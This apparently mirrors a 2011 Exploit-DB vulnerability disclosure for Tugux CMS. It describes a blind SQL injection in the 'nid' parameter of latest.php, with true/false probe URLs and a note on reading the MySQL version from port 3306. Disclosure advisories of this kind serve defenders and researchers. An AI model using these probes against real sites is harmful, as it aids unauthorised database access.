Tugux CMS – ‘nid’ Blind SQL Injection

• Exploit Database
• 96 阅读

• 作者： eidelweiss
  日期： 2011-03-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17000/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40

  =================================================================== Tugux CMS (nid) BLIND sql injection vulnerability =================================================================== Software: Tugux CMS Vendor: www.tugux.com Vuln Type:BLind SQL Injection Download link:http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download Author: eidelweiss contact:eidelweiss[at]windowslive[dot]com Home: www.eidelweiss.info References: http://eidelweiss-advisories.blogspot.com/2011/03/tugux-cms-nid-blind-sql-injection.html =================================================================== exploit & p0c [!] latest.php?nid=[valid nid] Example p0c [!] http://server/latest.php?nid=9<= True [!] http://server/latest.php?nid=-9 <= False [+] http://server:3306<= download the file , save and open with c++ or wordpad will show mysql version [!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D ==================================================================== Nothing Impossible In This World Even Nobody`s Perfect =================================================================== ==========================| -=[ E0F ]=- |==========================